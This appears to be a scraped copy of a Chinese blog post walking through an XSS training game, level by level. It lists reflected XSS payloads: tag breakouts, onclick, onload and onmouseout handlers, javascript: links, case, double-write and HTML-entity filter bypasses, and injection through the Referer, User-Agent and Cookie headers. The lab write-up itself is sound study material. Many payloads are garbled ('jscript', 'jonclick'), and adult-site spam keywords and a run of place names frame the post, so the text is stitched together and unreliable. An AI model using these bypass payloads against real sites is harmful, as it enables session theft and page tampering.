最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

xss小游戲

2023-03-08 16:52 作者:笨蛋灬你變了  | 我要投稿

第一關(guān):level1.php?name=test

  1. 將URL里的test修改為benda,查看頁面變化“歡迎用戶bendan”

  2. benda改為<jscript>alert(1)</jscript>

第二關(guān):/level2.php?keyword=test

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入"><jscript>alert(1)</jscript>

第三關(guān):/level3.php?writing=wait

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入<jscript>alert(1)</jscript>,頁面顯示:沒有找到和<jscript>alert(1)</jscript>相關(guān)的結(jié)果 開發(fā)者工具顯示:<>被過濾了

  3. 輸入框輸入" jonclick="alert(1)",頁面顯示:沒有找到和" jonclick="alert(1)"相關(guān)的結(jié)果 開發(fā)者工具:“被過濾

  4. 輸入框輸入'?jonclick='alert(1)',頁面顯示:沒有找到和' jonclick=alert(1)'相關(guān)的結(jié)果,點(diǎn)擊過關(guān)

第四關(guān):level4.php?keyword=try%20harder!

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入<jscript>alert(1)</jscript>,頁面顯示:沒有找到和<jscript>alert(1)</jscript>相關(guān)的結(jié)果 開發(fā)者工具顯示:<>被過濾了

  3. 輸入框輸入" jonclick="alert(1)",頁面顯示:沒有找到和" jonclick="alert(1)"相關(guān)的結(jié)果,點(diǎn)擊過關(guān)

第五關(guān):level5.php?keyword=find%20a%20way%20out!

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入"><jscript>alert(1)</jscript>,頁面顯示:沒有找到和"><jscript>alert(1)</jscript>相關(guān)的結(jié)果開發(fā)者工具:<input name=keyword ?value=""><scr_ipt>alert(1)</jscript>">

  3. 輸入框輸入" jonclick="alert(1)",頁面顯示:沒有找到和" jonclick="alert(1)"相關(guān)的結(jié)果 開發(fā)者工具:<input name=keyword ?value="" o_nclick="alert(1)"">

  4. 編碼、大小寫、雙寫均不能過關(guān)

  5. 構(gòu)造偽協(xié)議:"> <a href="jjavascript:alert(1)">點(diǎn)擊鏈接過關(guān)

第六關(guān):level6.php?keyword=break%20it%20out!

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入"><jscript>alert(1)</jscript>,頁面顯示:沒有找到和"><jscript>alert(1)</jscript>相關(guān)的結(jié)果開發(fā)者工具:<input name=keyword ?value=""><scr_ipt>alert(1)</jscript>">

  3. 輸入框輸入" jonclick="alert(1)",頁面顯示:沒有找到和" jonclick="alert(1)"相關(guān)的結(jié)果 開發(fā)者工具:<input name=keyword ?value="" o_nclick="alert(1)"">

  4. 構(gòu)造偽協(xié)議:"> <a href="jjavascript:alert(1)">,頁面顯示:沒有找到和"> <a href="jjavascript:alert(1)">相關(guān)的結(jié)果. 開發(fā)者工具:<input name=keyword ?value=""> <a hr_ef="jjavascript:alert(1)">"> <input name=keyword ?value=""><img sr_c='jjavascript:alert(1)' >">

  5. 大小寫繞過href——hRef,點(diǎn)擊鏈接過關(guān)

第七關(guān):/level7.php?keyword=move%20up!

  1. 有輸入框,輸入bendan,頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. 輸入框輸入"><jscript>alert(1)</jscript>,頁面顯示:沒有找到和"><jscript>alert(1)</jscript>相關(guān)的結(jié)果開發(fā)者工具:<input name=keyword ?value=""><>jalert(1)</>"> 字符jscript被過濾,,大小寫無效

  3. 輸入框輸入" jonclick="alert(1)",頁面顯示:沒有找到和" jonclick="alert(1)"相關(guān)的結(jié)果 開發(fā)者工具:<input name=keyword ?value="" click="alert(1)""> 字符 jonclick中的on被過濾,大小寫無效。雙寫oonn過關(guān)

第八關(guān):/level8.php?keyword=nice%20try!

  1. 有輸入框,輸入bendan,頁面無明顯變化

  2. 輸入框輸入"><jscript>alert(1)</jscript> 開發(fā)者響應(yīng)源碼:第一處:> < "被過濾,第二處:"被過濾且scr_ipt

  3. 輸入框輸入" jonclick="alert(1)" 響應(yīng)源碼:</center><center><BR><a href="&quot o_nclick=&quotalert(1)&quot">友情鏈接</a></center>

  4. 輸入框輸入jjavascript:alert(1) 響應(yīng)源碼:</center><center><BR><a href="jjavascr_ipt:alert(1)">友情鏈接</a></center><center>

  5. jjavascript:alert(1)全部進(jìn)行html編碼,點(diǎn)擊鏈接過關(guān)

    &#106&#97&#118&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

    簡單一點(diǎn):只需要將ri進(jìn)行html實(shí)體編碼:jjavasc&#114&#105;pt:alert(1)

第九關(guān):level9.php?keyword=not%20bad!

  1. 有輸入框,輸入bendan,頁面無明顯變化 響應(yīng)源碼:<a href="您的鏈接不合法?有沒有!">

  2. 輸入一個鏈接:http://www.baidu.com 再次輸入:http://123 響應(yīng)源碼:<a href="http://123">友情鏈接</a>

  3. 輸入框輸入http://jjavascript:alert(1) 響應(yīng)源碼:</center><center><BR><a href="http://javascr_ipt:alert(1)">友情鏈接</a></center><center>

  4. 反復(fù)確認(rèn)后證明只需要有http:// 這個字符就行:輸入jjavascript:alert(1)//http://。用//注釋后面所有代碼 響應(yīng)源碼:<a href="jjavascr_ipt:alert(1)//http://">友情鏈接</a>

  5. 將 ri 進(jìn)行html實(shí)體編碼:jjavascript:alert(1)//http:// 點(diǎn)擊鏈接過關(guān)

第十關(guān):level10.php?keyword=well%20done!

  1. 沒有輸入框,頁面顯示well done與URLwell done一致,在URL輸入bendan。頁面顯示:沒有找到和bendan相關(guān)的結(jié)果

  2. URL輸入:<jscript>alert(1)</jscript> 響應(yīng)源碼:有三個隱藏的input標(biāo)簽 用burpsuite軟件顯示隱藏標(biāo)簽并高亮,輸入內(nèi)容后無法提交。修改在開發(fā)者工具element中創(chuàng)建提交按鈕。

  3. 說明第三個輸入框可以進(jìn)行利用:輸入"><jscript>alert(1)</jscript> 響應(yīng)源碼:<input name="t_sort" ?value=""scriptalert(1)/script"> 說明:<>被過濾

  4. 輸入:" onclick="alert(1)" ? 點(diǎn)擊過關(guān)

第十一關(guān):/level11.php?keyword=good%20job!

  1. 在三個輸入框中輸入不同內(nèi)容,仍舊是第三個可以利用。

  2. 輸入:"><jscript>alert(1)</jscript>。顯示<>" 被過濾。無法利用

  3. 比較第四框中內(nèi)容為HTTP請求頭中的 referer,使用bp進(jìn)行攔截并修改為<jscript>alert(2)</jscript> 響應(yīng)源碼:scriptalert(2)/script 說明<>被過濾

  4. 修改為:" jonclick="alert(1)"。點(diǎn)擊過關(guān)

第十二關(guān):level12.php?keyword=good%20job!

  1. 比較第四框中內(nèi)容為HTTP請求頭中的 User-Agent,使用bp進(jìn)行攔截并修改為<jscript>alert(2)</jscript> 響應(yīng)源碼:scriptalert(2)/script 說明<>被過濾

  2. 修改為:" jonclick="alert(1)"。點(diǎn)擊過關(guān)

第十三關(guān):level13.php?keyword=good%20job!

  1. 四個輸入框輸入不同內(nèi)容 頁面顯示:

  2. 輸入<jscript>alert(2)</jscript>和" jonclick="alert(1)" 響應(yīng)源碼顯示:<>"被過濾

  3. 只能用第四個框:對比內(nèi)容為HTTP請求頭中的Cookie: user=。 使用bp進(jìn)行攔截并修改為" onclick="alert(1)"。點(diǎn)擊過關(guān)

第十四關(guān):level14.php(未完成)

第十五關(guān):在img標(biāo)簽添加jonload='alert(1)'

第十六關(guān):在img標(biāo)簽添加jonload='alert(1)'

第十七關(guān):jonmouseout=alert(1)

第十八關(guān):同上

第十九關(guān):同上

第二十關(guān):同上


僅供學(xué)習(xí)交流

標(biāo)簽:

xss小游戲的評論 (共 條)

分享到微博請遵守國家法律
宝丰县| 温泉县| 富蕴县| 茂名市| 开封市| 苗栗市| 望谟县| 怀宁县| 道孚县| 华亭县| 磴口县| 灵寿县| 资中县| 吐鲁番市| 万州区| 新民市| 桂平市| 神池县| 平果县| 志丹县| 石嘴山市| 黄浦区| 右玉县| 四川省| 明光市| 峨山| 奉新县| 青阳县| 靖江市| 中阳县| 调兵山市| 漠河县| 鄂伦春自治旗| 望城县| 西贡区| 镇安县| 清丰县| 滨州市| 唐河县| 麻江县| 阆中市|